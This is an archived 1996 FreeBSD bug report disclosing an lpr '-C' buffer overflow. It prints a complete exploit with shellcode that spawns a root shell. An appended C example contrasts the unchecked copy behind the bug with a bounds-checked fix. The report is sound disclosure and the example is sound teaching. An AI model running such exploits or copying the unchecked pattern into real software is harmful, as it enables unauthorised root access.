From ks@itp.ac.ru  Tue Nov 19 23:58:21 1996
Received: from itp.ac.ru (itp.ac.ru [193.233.32.4])
          by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA12251
          for <FreeBSD-gnats-submit@freebsd.org>; Tue, 19 Nov 1996 23:57:53 -0800 (PST)
Received: (ks@localhost) by itp.ac.ru (8.6.11/8.6.5) id LAA29022; Wed, 20 Nov 1996 11:04:48 +0300
Message-Id: <199611200804.LAA29022@itp.ac.ru>
Date: Wed, 20 Nov 1996 11:04:48 +0300
From: ks@itp.ac.ru
Reply-To: ks@itp.ac.ru
To: FreeBSD-gnats-submit@freebsd.org
Subject: lpr -C SECURITY HOLE!!! ROOT SHELL GAIN !!!!
X-Send-Pr-Version: 3.2

>Number:         2070
>Category:       bin
>Synopsis:       lpr -C SECURITY HOLE!!! ROOT SHELL GAIN !!!!
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    gnats-admin
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Wed Nov 20 00:00:02 PST 1996
>Closed-Date:    Wed Nov 27 19:39:09 PST 1996
>Last-Modified:  Mon Jul 05 15:50:55 GMT 2004
>Originator:     Sergey S. Kosyakov
>Release:        
>Organization:
>Environment:

	

>Description:

  I casually found simple code (the text is below) which gains any
registered user a shell with superuser privileges. 
The text:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen */
#include <unistd.h>

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] =
   "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
   "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
   "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
   "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}

Sergey Kosyakov
Presidium of Science Park in Chernogolovka of Russian Academy of Science,
Chernogolovka,
Moscow Region,
142432 Russia

E-Mail: ks@itp.ac.ru
Phone:  +7 (095) 7029317
Fax:    +7 (095) 9132317

>How-To-Repeat:

>Fix:

>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: fenner 
State-Changed-When: Wed Nov 27 19:39:09 PST 1996 
State-Changed-Why:  
This is a duplicate for PR #1863, and was fixed on October 27. 
>Unformatted:
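An added illustration of the bug class behind this report, written for this page and not taken from lpr or any FreeBSD source: a fixed-size field filled from a user-controlled option with no length check, next to the bounds-checked form that the fix for such a bug takes. The struct, the field size CLASS_LEN and the function names are assumptions for the example; the real lpr field sizes are not given in the PR.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Assumed field size for the example; the real lpr sizes are not on the page. */
#define CLASS_LEN 32

struct job {
    char jobclass[CLASS_LEN];   /* job classification, as passed with -C */
};

/* Vulnerable pattern (shown for contrast, deliberately never called here):
 * the option string is copied into the fixed field with no length check,
 * so an argument longer than CLASS_LEN - 1 bytes overwrites whatever
 * follows the field. In a setuid binary that is the class of bug the
 * report above exploits. */
void set_class_unchecked(struct job *j, const char *arg)
{
    strcpy(j->jobclass, arg);
}

/* Hardened form: validate length and content before copying, and fail
 * closed instead of truncating silently. Returns 0 on success, -1 when
 * the argument is rejected. */
int set_class_checked(struct job *j, const char *arg)
{
    size_t n = strlen(arg);
    size_t i;

    if (n == 0 || n >= CLASS_LEN)
        return -1;                     /* does not fit: reject, do not truncate */
    for (i = 0; i < n; i++) {
        if (!isprint((unsigned char)arg[i]))
            return -1;                 /* a classification is printable text */
    }
    memcpy(j->jobclass, arg, n + 1);   /* n + 1 includes the terminating NUL */
    return 0;
}

/* Convenience wrapper: result of the checked copy into a scratch job. */
int accepts(const char *arg)
{
    struct job j;
    return set_class_checked(&j, arg);
}

/* Demonstration on a constructed over-long argument of about the size the
 * exploit above builds (BUFFER_SIZE 1023 plus its trailer). Returns 0 when
 * every check behaves as expected. */
int demo(void)
{
    struct job j;
    char big[1100];                    /* constructed input, not from the page */

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    if (set_class_checked(&j, "fast") != 0 || strcmp(j.jobclass, "fast") != 0)
        return 1;                      /* ordinary value must be accepted intact */
    if (set_class_checked(&j, big) != -1)
        return 2;                      /* over-long value must be rejected */
    if (set_class_checked(&j, "a\tb") != -1)
        return 3;                      /* non-printable byte must be rejected */
    return 0;
}

int main(void)
{
    int rc = demo();
    printf("%s\n", rc == 0 ? "checks passed" : "check failed");
    return rc;
}
```

The point of the checked version is that the length test happens before any byte is written, and an over-long value is refused outright rather than cut to fit; a silent truncation would hide the same bad input from logs and from the user.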
